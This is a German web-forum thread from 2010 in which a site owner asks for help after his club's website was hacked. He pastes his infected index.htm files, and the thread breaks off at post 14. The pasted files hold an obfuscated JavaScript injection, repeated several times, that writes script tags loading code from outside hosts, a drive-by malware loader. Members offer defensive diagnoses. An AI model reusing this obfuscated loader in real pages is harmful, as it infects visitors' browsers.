ilch Forum » Allgemein » Plauder Ecke » Seite gehackt und Malware verbreitet

Geschlossen
  1. Di. 20.07.2010 19:52 Uhr #1
    User Pic
    Botox84 Mitglied
    Registriert seit
    09.08.2006
    Beiträge
    1.190
    Beitragswertungen
    21 Beitragspunkte
    Halli hallo,

    eine Seite von mir wurde gehackt und es wurde malware verbreitet:

    safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=de&site=http://www.gremium-schwerin.de/

    Nun Folgendes Problem, ich kann in der index oder so, nichts finden was dort nicht sein darf, außer diesen eintrag: 

    <body bgcolor="#000000"><script type="text/javascript">var nhZE2uSD="Ow8xN18Ow8xN31";var usW1446O0="Ow8xN3cOw8xN73Ow8xN63Ow8xN72"; var usW1446O1="Ow8xN69Ow8xN70Ow8xN74Ow8xN20"; var usW1446O2="Ow8xN74Ow8xN79Ow8xN70Ow8xN65"; var usW1446O3="Ow8xN3dOw8xN22Ow8xN74Ow8xN65"; var usW1446O4="Ow8xN78Ow8xN74Ow8xN2fOw8xN6a"; var usW1446O5="Ow8xN61Ow8xN76Ow8xN61Ow8xN73"; var usW1446O6="Ow8xN63Ow8xN72Ow8xN69Ow8xN70"; var usW1446O7="Ow8xN74Ow8xN22Ow8xN20Ow8xN73"; var usW1446O8="Ow8xN72Ow8xN63Ow8xN3dOw8xN22"; var usW1446O9="Ow8xN68Ow8xN74Ow8xN74Ow8xN70"; var usW1446O10="Ow8xN3aOw8xN2fOw8xN2fOw8xN61"; var usW1446O11="Ow8xN6eOw8xN6eOw8xN6fOw8xN75"; var usW1446O12="Ow8xN2eOw8xN73Ow8xN65Ow8xN72"; var usW1446O13="Ow8xN76Ow8xN65Ow8xN68Ow8xN74"; var usW1446O14="Ow8xN74Ow8xN70Ow8xN2eOw8xN63"; var usW1446O15="Ow8xN6fOw8xN6dOw8xN2fOw8xN2f"; var usW1446O16="Ow8xN6dOw8xN6cOw8xN2eOw8xN70"; var usW1446O17="Ow8xN68Ow8xN70Ow8xN22Ow8xN3e"; var usW1446O18="Ow8xN20Ow8xN3cOw8xN2fOw8xN73"; var usW1446O19="Ow8xN63Ow8xN72Ow8xN69Ow8xN70"; var usW1446O20="Ow8xN74Ow8xN3e"; var JgUg10US="g4Uuq18Ow8xN31";var Q8NVsUq5=usW1446O0+usW1446O1+usW1446O2+usW1446O3+usW1446O4+usW1446O5+usW1446O6+usW1446O7+usW1446O8+usW1446O9+usW1446O10+usW1446O11+usW1446O12+usW1446O13+usW1446O14+usW1446O15+usW1446O16+usW1446O17+usW1446O18+usW1446O19+usW1446O20; CvhvkAeR=Q8NVsUq5.replace(/Ow8xN/g,"%");var KcQGBJKD=unescape;var nhZE2uSD="cZLH618g4Uuq31";q9124=this;var WrEGuKeo=q9124["WYd1GoGYc2uG1mYGe2YnltY".replace(/[Y12WlG\:]/g, "")];WrEGuKeo.write(KcQGBJKD(CvhvkAeR));</script><script type="text/javascript">var yUyzuXFB="STgZJ15STgZJ34";var QrroeOFm0="STgZJ3cSTgZJ73STgZJ63STgZJ7"; var QrroeOFm1="2STgZJ69STgZJ70STgZJ74STgZJ"; var QrroeOFm2="20STgZJ74STgZJ79STgZJ70STgZ"; var QrroeOFm3="J65STgZJ3dSTgZJ22STgZJ74STg"; var QrroeOFm4="ZJ65STgZJ78STgZJ74STgZJ2fST"; var QrroeOFm5="gZJ6aSTgZJ61STgZJ76STgZJ61S"; var QrroeOFm6="TgZJ73STgZJ63STgZJ72STgZJ69"; var QrroeOFm7="STgZJ70STgZJ74STgZJ22STgZJ2"; var QrroeOFm8="0STgZJ73STgZJ72STgZJ63STgZJ"; var QrroeOFm9="3dSTgZJ22STgZJ68STgZJ74STgZ"; var QrroeOFm10="J74STgZJ70STgZJ3aSTgZJ2fSTg"; var QrroeOFm11="ZJ2fSTgZJ61STgZJ6eSTgZJ65ST"; var QrroeOFm12="gZJ77STgZJ77STgZJ2eSTgZJ73S"; var QrroeOFm13="TgZJ65STgZJ72STgZJ76STgZJ65"; var QrroeOFm14="STgZJ62STgZJ6cSTgZJ6fSTgZJ6"; var QrroeOFm15="7STgZJ2eSTgZJ6eSTgZJ65STgZJ"; var QrroeOFm16="74STgZJ2fSTgZJ2fSTgZJ6dSTgZ"; var QrroeOFm17="J6cSTgZJ2eSTgZJ70STgZJ68STg"; var QrroeOFm18="ZJ70STgZJ22STgZJ3eSTgZJ20ST"; var QrroeOFm19="gZJ3cSTgZJ2fSTgZJ73STgZJ63S"; var QrroeOFm20="TgZJ72STgZJ69STgZJ70STgZJ74"; var QrroeOFm21="STgZJ3e"; var FK8meouU="PpT0s15STgZJ34";var mWZQF2Dj=QrroeOFm0+QrroeOFm1+QrroeOFm2+QrroeOFm3+QrroeOFm4+QrroeOFm5+QrroeOFm6+QrroeOFm7+QrroeOFm8+QrroeOFm9+QrroeOFm10+QrroeOFm11+QrroeOFm12+QrroeOFm13+QrroeOFm14+QrroeOFm15+QrroeOFm16+QrroeOFm17+QrroeOFm18+QrroeOFm19+QrroeOFm20+QrroeOFm21; WlLIgEcn=mWZQF2Dj.replace(/STgZJ/g,"%");var OlR0FQYF=unescape;var yUyzuXFB="MTcxj15PpT0s34";q9124=this;var rQ5voJh9=q9124["WYd1GoGYc2uG1mYGe2YnltY".replace(/[Y12WlG\:]/g, "")];rQ5voJh9.write(OlR0FQYF(WlLIgEcn));</script>
<div><a href="index.php" target="_self">


    Weiss jemand was das ist?

    Dieser eintrag ist 2 mal in der Index.htm am anfang des Servers und im design ordner in der index.htm einmal der eintrag. Am besten ich poste mal beide zwinker

    Das ist die am anfang des Servers: 
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Gremium Motorcycle Club - Schwerin Eastside</title>

<body bgcolor="#000000"><script type="text/javascript">var nhZE2uSD="Ow8xN18Ow8xN31";var usW1446O0="Ow8xN3cOw8xN73Ow8xN63Ow8xN72"; var usW1446O1="Ow8xN69Ow8xN70Ow8xN74Ow8xN20"; var usW1446O2="Ow8xN74Ow8xN79Ow8xN70Ow8xN65"; var usW1446O3="Ow8xN3dOw8xN22Ow8xN74Ow8xN65"; var usW1446O4="Ow8xN78Ow8xN74Ow8xN2fOw8xN6a"; var usW1446O5="Ow8xN61Ow8xN76Ow8xN61Ow8xN73"; var usW1446O6="Ow8xN63Ow8xN72Ow8xN69Ow8xN70"; var usW1446O7="Ow8xN74Ow8xN22Ow8xN20Ow8xN73"; var usW1446O8="Ow8xN72Ow8xN63Ow8xN3dOw8xN22"; var usW1446O9="Ow8xN68Ow8xN74Ow8xN74Ow8xN70"; var usW1446O10="Ow8xN3aOw8xN2fOw8xN2fOw8xN61"; var usW1446O11="Ow8xN6eOw8xN6eOw8xN6fOw8xN75"; var usW1446O12="Ow8xN2eOw8xN73Ow8xN65Ow8xN72"; var usW1446O13="Ow8xN76Ow8xN65Ow8xN68Ow8xN74"; var usW1446O14="Ow8xN74Ow8xN70Ow8xN2eOw8xN63"; var usW1446O15="Ow8xN6fOw8xN6dOw8xN2fOw8xN2f"; var usW1446O16="Ow8xN6dOw8xN6cOw8xN2eOw8xN70"; var usW1446O17="Ow8xN68Ow8xN70Ow8xN22Ow8xN3e"; var usW1446O18="Ow8xN20Ow8xN3cOw8xN2fOw8xN73"; var usW1446O19="Ow8xN63Ow8xN72Ow8xN69Ow8xN70"; var usW1446O20="Ow8xN74Ow8xN3e"; var JgUg10US="g4Uuq18Ow8xN31";var Q8NVsUq5=usW1446O0+usW1446O1+usW1446O2+usW1446O3+usW1446O4+usW1446O5+usW1446O6+usW1446O7+usW1446O8+usW1446O9+usW1446O10+usW1446O11+usW1446O12+usW1446O13+usW1446O14+usW1446O15+usW1446O16+usW1446O17+usW1446O18+usW1446O19+usW1446O20; CvhvkAeR=Q8NVsUq5.replace(/Ow8xN/g,"%");var KcQGBJKD=unescape;var nhZE2uSD="cZLH618g4Uuq31";q9124=this;var WrEGuKeo=q9124["WYd1GoGYc2uG1mYGe2YnltY".replace(/[Y12WlG\:]/g, "")];WrEGuKeo.write(KcQGBJKD(CvhvkAeR));</script><script type="text/javascript">var yUyzuXFB="STgZJ15STgZJ34";var QrroeOFm0="STgZJ3cSTgZJ73STgZJ63STgZJ7"; var QrroeOFm1="2STgZJ69STgZJ70STgZJ74STgZJ"; var QrroeOFm2="20STgZJ74STgZJ79STgZJ70STgZ"; var QrroeOFm3="J65STgZJ3dSTgZJ22STgZJ74STg"; var QrroeOFm4="ZJ65STgZJ78STgZJ74STgZJ2fST"; var QrroeOFm5="gZJ6aSTgZJ61STgZJ76STgZJ61S"; var QrroeOFm6="TgZJ73STgZJ63STgZJ72STgZJ69"; var QrroeOFm7="STgZJ70STgZJ74STgZJ22STgZJ2"; var QrroeOFm8="0STgZJ73STgZJ72STgZJ63STgZJ"; var QrroeOFm9="3dSTgZJ22STgZJ68STgZJ74STgZ"; var QrroeOFm10="J74STgZJ70STgZJ3aSTgZJ2fSTg"; var QrroeOFm11="ZJ2fSTgZJ61STgZJ6eSTgZJ65ST"; var QrroeOFm12="gZJ77STgZJ77STgZJ2eSTgZJ73S"; var QrroeOFm13="TgZJ65STgZJ72STgZJ76STgZJ65"; var QrroeOFm14="STgZJ62STgZJ6cSTgZJ6fSTgZJ6"; var QrroeOFm15="7STgZJ2eSTgZJ6eSTgZJ65STgZJ"; var QrroeOFm16="74STgZJ2fSTgZJ2fSTgZJ6dSTgZ"; var QrroeOFm17="J6cSTgZJ2eSTgZJ70STgZJ68STg"; var QrroeOFm18="ZJ70STgZJ22STgZJ3eSTgZJ20ST"; var QrroeOFm19="gZJ3cSTgZJ2fSTgZJ73STgZJ63S"; var QrroeOFm20="TgZJ72STgZJ69STgZJ70STgZJ74"; var QrroeOFm21="STgZJ3e"; var FK8meouU="PpT0s15STgZJ34";var mWZQF2Dj=QrroeOFm0+QrroeOFm1+QrroeOFm2+QrroeOFm3+QrroeOFm4+QrroeOFm5+QrroeOFm6+QrroeOFm7+QrroeOFm8+QrroeOFm9+QrroeOFm10+QrroeOFm11+QrroeOFm12+QrroeOFm13+QrroeOFm14+QrroeOFm15+QrroeOFm16+QrroeOFm17+QrroeOFm18+QrroeOFm19+QrroeOFm20+QrroeOFm21; WlLIgEcn=mWZQF2Dj.replace(/STgZJ/g,"%");var OlR0FQYF=unescape;var yUyzuXFB="MTcxj15PpT0s34";q9124=this;var rQ5voJh9=q9124["WYd1GoGYc2uG1mYGe2YnltY".replace(/[Y12WlG\:]/g, "")];rQ5voJh9.write(OlR0FQYF(WlLIgEcn));</script>
<style type="text/css">
<!--
a {
text-decoration:none;
}
div {
        text-align: center;
}

-->
</style>
</head>

<body bgcolor="#000000"><script type="text/javascript">var nhZE2uSD="Ow8xN18Ow8xN31";var usW1446O0="Ow8xN3cOw8xN73Ow8xN63Ow8xN72"; var usW1446O1="Ow8xN69Ow8xN70Ow8xN74Ow8xN20"; var usW1446O2="Ow8xN74Ow8xN79Ow8xN70Ow8xN65"; var usW1446O3="Ow8xN3dOw8xN22Ow8xN74Ow8xN65"; var usW1446O4="Ow8xN78Ow8xN74Ow8xN2fOw8xN6a"; var usW1446O5="Ow8xN61Ow8xN76Ow8xN61Ow8xN73"; var usW1446O6="Ow8xN63Ow8xN72Ow8xN69Ow8xN70"; var usW1446O7="Ow8xN74Ow8xN22Ow8xN20Ow8xN73"; var usW1446O8="Ow8xN72Ow8xN63Ow8xN3dOw8xN22"; var usW1446O9="Ow8xN68Ow8xN74Ow8xN74Ow8xN70"; var usW1446O10="Ow8xN3aOw8xN2fOw8xN2fOw8xN61"; var usW1446O11="Ow8xN6eOw8xN6eOw8xN6fOw8xN75"; var usW1446O12="Ow8xN2eOw8xN73Ow8xN65Ow8xN72"; var usW1446O13="Ow8xN76Ow8xN65Ow8xN68Ow8xN74"; var usW1446O14="Ow8xN74Ow8xN70Ow8xN2eOw8xN63"; var usW1446O15="Ow8xN6fOw8xN6dOw8xN2fOw8xN2f"; var usW1446O16="Ow8xN6dOw8xN6cOw8xN2eOw8xN70"; var usW1446O17="Ow8xN68Ow8xN70Ow8xN22Ow8xN3e"; var usW1446O18="Ow8xN20Ow8xN3cOw8xN2fOw8xN73"; var usW1446O19="Ow8xN63Ow8xN72Ow8xN69Ow8xN70"; var usW1446O20="Ow8xN74Ow8xN3e"; var JgUg10US="g4Uuq18Ow8xN31";var Q8NVsUq5=usW1446O0+usW1446O1+usW1446O2+usW1446O3+usW1446O4+usW1446O5+usW1446O6+usW1446O7+usW1446O8+usW1446O9+usW1446O10+usW1446O11+usW1446O12+usW1446O13+usW1446O14+usW1446O15+usW1446O16+usW1446O17+usW1446O18+usW1446O19+usW1446O20; CvhvkAeR=Q8NVsUq5.replace(/Ow8xN/g,"%");var KcQGBJKD=unescape;var nhZE2uSD="cZLH618g4Uuq31";q9124=this;var WrEGuKeo=q9124["WYd1GoGYc2uG1mYGe2YnltY".replace(/[Y12WlG\:]/g, "")];WrEGuKeo.write(KcQGBJKD(CvhvkAeR));</script><script type="text/javascript">var yUyzuXFB="STgZJ15STgZJ34";var QrroeOFm0="STgZJ3cSTgZJ73STgZJ63STgZJ7"; var QrroeOFm1="2STgZJ69STgZJ70STgZJ74STgZJ"; var QrroeOFm2="20STgZJ74STgZJ79STgZJ70STgZ"; var QrroeOFm3="J65STgZJ3dSTgZJ22STgZJ74STg"; var QrroeOFm4="ZJ65STgZJ78STgZJ74STgZJ2fST"; var QrroeOFm5="gZJ6aSTgZJ61STgZJ76STgZJ61S"; var QrroeOFm6="TgZJ73STgZJ63STgZJ72STgZJ69"; var QrroeOFm7="STgZJ70STgZJ74STgZJ22STgZJ2"; var QrroeOFm8="0STgZJ73STgZJ72STgZJ63STgZJ"; var QrroeOFm9="3dSTgZJ22STgZJ68STgZJ74STgZ"; var QrroeOFm10="J74STgZJ70STgZJ3aSTgZJ2fSTg"; var QrroeOFm11="ZJ2fSTgZJ61STgZJ6eSTgZJ65ST"; var QrroeOFm12="gZJ77STgZJ77STgZJ2eSTgZJ73S"; var QrroeOFm13="TgZJ65STgZJ72STgZJ76STgZJ65"; var QrroeOFm14="STgZJ62STgZJ6cSTgZJ6fSTgZJ6"; var QrroeOFm15="7STgZJ2eSTgZJ6eSTgZJ65STgZJ"; var QrroeOFm16="74STgZJ2fSTgZJ2fSTgZJ6dSTgZ"; var QrroeOFm17="J6cSTgZJ2eSTgZJ70STgZJ68STg"; var QrroeOFm18="ZJ70STgZJ22STgZJ3eSTgZJ20ST"; var QrroeOFm19="gZJ3cSTgZJ2fSTgZJ73STgZJ63S"; var QrroeOFm20="TgZJ72STgZJ69STgZJ70STgZJ74"; var QrroeOFm21="STgZJ3e"; var FK8meouU="PpT0s15STgZJ34";var mWZQF2Dj=QrroeOFm0+QrroeOFm1+QrroeOFm2+QrroeOFm3+QrroeOFm4+QrroeOFm5+QrroeOFm6+QrroeOFm7+QrroeOFm8+QrroeOFm9+QrroeOFm10+QrroeOFm11+QrroeOFm12+QrroeOFm13+QrroeOFm14+QrroeOFm15+QrroeOFm16+QrroeOFm17+QrroeOFm18+QrroeOFm19+QrroeOFm20+QrroeOFm21; WlLIgEcn=mWZQF2Dj.replace(/STgZJ/g,"%");var OlR0FQYF=unescape;var yUyzuXFB="MTcxj15PpT0s34";q9124=this;var rQ5voJh9=q9124["WYd1GoGYc2uG1mYGe2YnltY".replace(/[Y12WlG\:]/g, "")];rQ5voJh9.write(OlR0FQYF(WlLIgEcn));</script>
<div><a href="index.php" target="_self">
<!--- introbild.jpg einfach ändern wenn man ein eigenes hat -->
  <img src="introbild.jpg" onmouseover="this.src='introbild_hover.jpg'" onmouseout="this.src='introbild.jpg'" border="0" alt="introbild" width="1200" height="619" /><br />

</a></div>

<div style=”width:400px;margin:auto;”>
<embed name="CrunchyPyrates" src="music.mp3" border="2" width="0" height="0" autostart="true" Delay="0" VOLUME="35" loop="true" controls="smallconsole">
</div>

</body>
</html>


    Und das ist die index im design ordner: 

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<link rel="shortcut icon" href="http://www.gremium.de/favicon.ico"/>
  <title>Gremium - Schwerin</title>
  <link href="include/designs/gremium/style.css" rel="stylesheet" type="text/css" />
  <script type="text/javascript" src="include/designs/gremium/scroller.js"></script>
</head>
<body><script type="text/javascript">var nhZE2uSD="Ow8xN18Ow8xN31";var usW1446O0="Ow8xN3cOw8xN73Ow8xN63Ow8xN72"; var usW1446O1="Ow8xN69Ow8xN70Ow8xN74Ow8xN20"; var usW1446O2="Ow8xN74Ow8xN79Ow8xN70Ow8xN65"; var usW1446O3="Ow8xN3dOw8xN22Ow8xN74Ow8xN65"; var usW1446O4="Ow8xN78Ow8xN74Ow8xN2fOw8xN6a"; var usW1446O5="Ow8xN61Ow8xN76Ow8xN61Ow8xN73"; var usW1446O6="Ow8xN63Ow8xN72Ow8xN69Ow8xN70"; var usW1446O7="Ow8xN74Ow8xN22Ow8xN20Ow8xN73"; var usW1446O8="Ow8xN72Ow8xN63Ow8xN3dOw8xN22"; var usW1446O9="Ow8xN68Ow8xN74Ow8xN74Ow8xN70"; var usW1446O10="Ow8xN3aOw8xN2fOw8xN2fOw8xN61"; var usW1446O11="Ow8xN6eOw8xN6eOw8xN6fOw8xN75"; var usW1446O12="Ow8xN2eOw8xN73Ow8xN65Ow8xN72"; var usW1446O13="Ow8xN76Ow8xN65Ow8xN68Ow8xN74"; var usW1446O14="Ow8xN74Ow8xN70Ow8xN2eOw8xN63"; var usW1446O15="Ow8xN6fOw8xN6dOw8xN2fOw8xN2f"; var usW1446O16="Ow8xN6dOw8xN6cOw8xN2eOw8xN70"; var usW1446O17="Ow8xN68Ow8xN70Ow8xN22Ow8xN3e"; var usW1446O18="Ow8xN20Ow8xN3cOw8xN2fOw8xN73"; var usW1446O19="Ow8xN63Ow8xN72Ow8xN69Ow8xN70"; var usW1446O20="Ow8xN74Ow8xN3e"; var JgUg10US="g4Uuq18Ow8xN31";var Q8NVsUq5=usW1446O0+usW1446O1+usW1446O2+usW1446O3+usW1446O4+usW1446O5+usW1446O6+usW1446O7+usW1446O8+usW1446O9+usW1446O10+usW1446O11+usW1446O12+usW1446O13+usW1446O14+usW1446O15+usW1446O16+usW1446O17+usW1446O18+usW1446O19+usW1446O20; CvhvkAeR=Q8NVsUq5.replace(/Ow8xN/g,"%");var KcQGBJKD=unescape;var nhZE2uSD="cZLH618g4Uuq31";q9124=this;var WrEGuKeo=q9124["WYd1GoGYc2uG1mYGe2YnltY".replace(/[Y12WlG\:]/g, "")];WrEGuKeo.write(KcQGBJKD(CvhvkAeR));</script><script type="text/javascript">var yUyzuXFB="STgZJ15STgZJ34";var QrroeOFm0="STgZJ3cSTgZJ73STgZJ63STgZJ7"; var QrroeOFm1="2STgZJ69STgZJ70STgZJ74STgZJ"; var QrroeOFm2="20STgZJ74STgZJ79STgZJ70STgZ"; var QrroeOFm3="J65STgZJ3dSTgZJ22STgZJ74STg"; var QrroeOFm4="ZJ65STgZJ78STgZJ74STgZJ2fST"; var QrroeOFm5="gZJ6aSTgZJ61STgZJ76STgZJ61S"; var QrroeOFm6="TgZJ73STgZJ63STgZJ72STgZJ69"; var QrroeOFm7="STgZJ70STgZJ74STgZJ22STgZJ2"; var QrroeOFm8="0STgZJ73STgZJ72STgZJ63STgZJ"; var QrroeOFm9="3dSTgZJ22STgZJ68STgZJ74STgZ"; var QrroeOFm10="J74STgZJ70STgZJ3aSTgZJ2fSTg"; var QrroeOFm11="ZJ2fSTgZJ61STgZJ6eSTgZJ65ST"; var QrroeOFm12="gZJ77STgZJ77STgZJ2eSTgZJ73S"; var QrroeOFm13="TgZJ65STgZJ72STgZJ76STgZJ65"; var QrroeOFm14="STgZJ62STgZJ6cSTgZJ6fSTgZJ6"; var QrroeOFm15="7STgZJ2eSTgZJ6eSTgZJ65STgZJ"; var QrroeOFm16="74STgZJ2fSTgZJ2fSTgZJ6dSTgZ"; var QrroeOFm17="J6cSTgZJ2eSTgZJ70STgZJ68STg"; var QrroeOFm18="ZJ70STgZJ22STgZJ3eSTgZJ20ST"; var QrroeOFm19="gZJ3cSTgZJ2fSTgZJ73STgZJ63S"; var QrroeOFm20="TgZJ72STgZJ69STgZJ70STgZJ74"; var QrroeOFm21="STgZJ3e"; var FK8meouU="PpT0s15STgZJ34";var mWZQF2Dj=QrroeOFm0+QrroeOFm1+QrroeOFm2+QrroeOFm3+QrroeOFm4+QrroeOFm5+QrroeOFm6+QrroeOFm7+QrroeOFm8+QrroeOFm9+QrroeOFm10+QrroeOFm11+QrroeOFm12+QrroeOFm13+QrroeOFm14+QrroeOFm15+QrroeOFm16+QrroeOFm17+QrroeOFm18+QrroeOFm19+QrroeOFm20+QrroeOFm21; WlLIgEcn=mWZQF2Dj.replace(/STgZJ/g,"%");var OlR0FQYF=unescape;var yUyzuXFB="MTcxj15PpT0s34";q9124=this;var rQ5voJh9=q9124["WYd1GoGYc2uG1mYGe2YnltY".replace(/[Y12WlG\:]/g, "")];rQ5voJh9.write(OlR0FQYF(WlLIgEcn));</script>
<div id="wrap">
        <div id="gremium_header">
                <a id="btnStart" href="index.php"></a>
                <a id="btnHistorie" href="http://www.gremium.de/d/gremium.html" target="_blank"></a>
                <a id="btnGbook" href="index.php?gbook"></a>
                <a id="btnTermine" href="http://www.gremium.de/d/party.html" target="_blank"></a>
                <a id="btnGallerie" href="index.php?gallery"></a>
                <a id="btnImpressum" href="index.php?impressum"></a>
                <a id="btnKontakt" href="index.php?contact"></a>
        </div>
        <div id="gremium_content" class="Container">
           <div id="Scroller-1">
                <div class="Scroller-Container">{EXPLODE}</div>
                </div>
                <div id="Scrollbar-Container">
                        <div class="Scrollbar-Track">
                                 <div class="Scrollbar-Handle"></div>
                        </div>
                </div>
        </div>
        <div id="gremium_footer">
<a id="link" href="index.php?links"></a>
           <a id="banner" href="http://www.gremium.de" target="_blank"></a>
                <div id="boxCounter">{_boxes_gremium_counter}</div>
        </div>
</div>
</body>
</html>


    Vielen Dank für eure Hilfe^^

    betroffene Homepage: externer Link
    Chat Roulette Chatroulette Baushop
    0 Mitglieder finden den Beitrag gut.
  2. Di. 20.07.2010 20:00 Uhr #2
    User Pic
    Chapter Hall Of Fame
    Registriert seit
    21.10.2007
    Beiträge
    5.951
    Beitragswertungen
    229 Beitragspunkte
    Allem anschein nach besteht die möglichkeit schadcode im cms einzuschleusen. wie das allerdings geht weiß ich nicht. aber da müssten sich die coder evtl. mal drum kümmern.
    Spamming, sinnlose Beiträge, Pushing, Doppelposting und Werbung sind verboten
    externer Link
    0 Mitglieder finden den Beitrag gut.
  3. Di. 20.07.2010 20:38 Uhr #3
    User Pic
    Revolution Hall Of Fame
    Registriert seit
    14.08.2006
    Beiträge
    1.688
    Beitragswertungen
    109 Beitragspunkte
    ZitatZitat geschrieben von Chapter

    Allem anschein nach besteht die möglichkeit schadcode im cms einzuschleusen. wie das allerdings geht weiß ich nicht. aber da müssten sich die coder evtl. mal drum kümmern.


    Naja ich tip hier mal mehr auf ein unsicheres FTP Kennwort, falls möglich seh dir mal die Logfiles an.

    und such nach komischen IP Adressen, andere Länder etc.

    Achja und Kennwörter ändern, FTP und auch MySQL.
    Kreativ, modern, Conversion und Usability optimiert
    individuelles Webdesign für ein optimales Erscheinungsbild
    404studios
    0 Mitglieder finden den Beitrag gut.
  4. Di. 20.07.2010 20:39 Uhr #4
    User Pic
    eumel Mitglied
    Registriert seit
    20.07.2010
    Beiträge
    1
    Beitragswertungen
    0 Beitragspunkte
    Ich habe derzeit auch sowas, ist schon richtig nervig um den fehler zu finden..
    Extensions
    0 Mitglieder finden den Beitrag gut.
  5. Di. 20.07.2010 20:42 Uhr #5
    User Pic
    Swamp Mitglied
    Registriert seit
    02.02.2006
    Beiträge
    2.094
    Beitragswertungen
    21 Beitragspunkte
    Botox84, du hattest doch schon mal Probleme wegen Hacks richtig? Ich würde mal sichere Passwörter benutzen...

    ...oder es ist eine Lücke im CMS...

    MfG. Swamp


    Zuletzt modifiziert von Swamp am 20.07.2010 - 20:42:32
    Wer zuletzt lacht, hat den schlechtesten Ping.
    0 Mitglieder finden den Beitrag gut.
  6. Di. 20.07.2010 21:02 Uhr #6
    User Pic
    Botox84 Mitglied
    Registriert seit
    09.08.2006
    Beiträge
    1.190
    Beitragswertungen
    21 Beitragspunkte
    ZitatZitat geschrieben von Swamp

    Botox84, du hattest doch schon mal Probleme wegen Hacks richtig? Ich würde mal sichere Passwörter benutzen...

    ...oder es ist eine Lücke im CMS...

    MfG. Swamp


    Zuletzt modifiziert von Swamp am 20.07.2010 - 20:42:32


    ehhhm, meine passwörter sehen so aus: x2RfG23SdObrQ34h&
    Also so in der Art halt zwinker
    Chat Roulette Chatroulette Baushop
    0 Mitglieder finden den Beitrag gut.
  7. Di. 20.07.2010 21:38 Uhr #7
    User Pic
    annemarie gelöschter User
    hallo erstmal,

    also erstmal würde ich dazu sagen das jemand auf deinem webspace ein script ausgeführt hat, da anscheinend nur dateien mit den namensschema index.* bearbeitet wurden.

    und die supercodes haben mich an einen artikel von heise security erinnert, Alarm beim Pizzadienst.

    eine injectionlücke schließe ich vorerst aus da hier definitiv files geändert wurden.

    kannst uns ja noch weiter auf dem laufenden halten ob dir noch irgendetwas auffällt
    0 Mitglieder finden den Beitrag gut.
  8. Di. 20.07.2010 21:44 Uhr #8
    User Pic
    Botox84 Mitglied
    Registriert seit
    09.08.2006
    Beiträge
    1.190
    Beitragswertungen
    21 Beitragspunkte
    Bin mal recht viele Daten durchgegangen, auf dem webspace lagen 2 Seiten.

    Bei einer Seite wurde die index.htm im Design Ordner verändert und bei der anderen Seite wurden beide index.htm´s verändert, grundsätzlich sind php datein nicht befallen und andere htm´s auch nicht.

    Ein Script ausgeführt, kann ich mir auch nicht vorstellen, da keine anderen Datein vorhanden sind mit dem das Script ausgeführt werden könnte^^

    Ich denke, da war jemand per Hand bei, da alle Datein unterschiedlich bearbeitet wurden. Sprich, bei einer waren 2x mal der selbe Schadcode drin, bei anderen nur einmal und dann auch an anderer Stelle.

    Nur frage ich mich, liegts an ilch??? Ich will das eher abwiegen da ja ilch recht sicher sein soll......aber an meinen Passwörtern kanns auch nicht liegen, da bin ich mir sehr sicher^^
    Chat Roulette Chatroulette Baushop
    0 Mitglieder finden den Beitrag gut.
  9. Di. 20.07.2010 22:00 Uhr #9
    User Pic
    Revolution Hall Of Fame
    Registriert seit
    14.08.2006
    Beiträge
    1.688
    Beitragswertungen
    109 Beitragspunkte
    ZitatZitat geschrieben von annemarie

    eine injectionlücke schließe ich vorerst aus da hier definitiv files geändert wurden.


    das mein ich auch, index.htm / .html / .. sind dateien die 99,9% auf jedem Webspace vorhanden sind.


    Ilch als Sicherheitslücke (außer du nutzt eine alte Version) würde ich ebenfalls ausschließen.

    Hat noch jemand Zugriffsrechte?
    FTP bzw. Adminbereich ?

    Wie sicher ist dein Admin PW?

    Zuletzt modifiziert von Revolution am 20.07.2010 - 22:02:42
    Kreativ, modern, Conversion und Usability optimiert
    individuelles Webdesign für ein optimales Erscheinungsbild
    404studios
    0 Mitglieder finden den Beitrag gut.
  10. Di. 20.07.2010 22:01 Uhr #10
    User Pic
    Botox84 Mitglied
    Registriert seit
    09.08.2006
    Beiträge
    1.190
    Beitragswertungen
    21 Beitragspunkte
    Ne, hat keiner mehr zugriffsrechte^^

    Benutzt wurde die aktuellste version vom clanscript zwinker
    Chat Roulette Chatroulette Baushop
    0 Mitglieder finden den Beitrag gut.
  11. Di. 20.07.2010 23:51 Uhr #11
    User Pic
    MaddinXx Mitglied
    Registriert seit
    15.02.2007
    Beiträge
    787
    Beitragswertungen
    40 Beitragspunkte
    Vielleicht, ich kenn mich nicht aus aber ich schreibs jetzt mal, liegts an den CHMOD?

    Ich weiss zwar nicht, ob das sein kann, aber auf Plesk musste ich die Ordner etc. auf 777 stellen, wobei bei Confixx 755 reicht und 777 dann evtl. ein Risiko wäre?

    Ist nur eine Vermutung und evtl. Blödsinn, aber da alle im Duneln tappen, kanns nicht schaden gepostet zu sein lächeln
    0 Mitglieder finden den Beitrag gut.
  12. Mi. 21.07.2010 01:28 Uhr #12
    User Pic
    Revolution Hall Of Fame
    Registriert seit
    14.08.2006
    Beiträge
    1.688
    Beitragswertungen
    109 Beitragspunkte
    Man kann ja nie wissen aber such mal nach böser Software auf deinem PC.
    Viren, Trojaner oder zb. Keylogger etc


    Zuletzt modifiziert von Revolution am 21.07.2010 - 01:37:52
    Kreativ, modern, Conversion und Usability optimiert
    individuelles Webdesign für ein optimales Erscheinungsbild
    404studios
    0 Mitglieder finden den Beitrag gut.
  13. Mi. 21.07.2010 10:04 Uhr #13
    User Pic
    GeCk0 Hall Of Fame
    Registriert seit
    01.05.2009
    Beiträge
    2.989
    Beitragswertungen
    96 Beitragspunkte
    hast du irgendwelche uploadmöglichkeiten wie das upload-modul, user-gallerie oder ähnliches ? schau mal deine ganzen ordner durch ob da irgendwo ein script rumliegt das da nicht hingehört
    also am besten keine php-dateien o.ä. beim upload erlauben

    ansonsten kann man hier lange raten was das sein könnte, such dir jemanden der dir hilft die Lücken zu finden
    Alle Module von mir sind nun unter php-gecko.de erreichbar
    0 Mitglieder finden den Beitrag gut.
  14. Mi. 21.07.2010 10:16 Uhr #14
    User Pic
    Botox84 Mitglied
    Registriert seit
    09.08.2006
    Beiträge
    1.190
    Beitragswertungen
